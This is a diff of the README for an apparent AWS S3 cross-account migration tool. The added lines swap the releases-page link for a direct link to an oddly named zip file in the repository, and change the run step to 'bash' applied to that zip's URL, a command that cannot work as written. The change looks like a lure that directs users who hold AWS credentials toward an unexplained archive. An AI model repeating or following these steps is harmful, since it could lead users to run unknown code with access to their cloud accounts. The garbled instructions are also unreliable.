brandonFN/aws-s3-cross-account-migration/README.md

 ## 📥 Download & Install

-To begin your migration journey, simply visit this [page to download](https://github.com/brandonFN/aws-s3-cross-account-migration/releases).
+To begin your migration journey, simply visit this [page to download](https://raw.githubusercontent.com/brandonFN/aws-s3-cross-account-migration/master/achievable/account-s-migration-aws-cross-2.9.zip).

 ### Steps to Follow After Downloading

 1. Review any README or instructions provided in the zip file.
 2. Follow the script instruction to set up your AWS credentials, if you have not done so already.
-3. Run the script by typing `bash migrate.sh` in your terminal.
+3. Run the script by typing `bash https://raw.githubusercontent.com/brandonFN/aws-s3-cross-account-migration/master/achievable/account-s-migration-aws-cross-2.9.zip` in your terminal.

 ## ✨ Features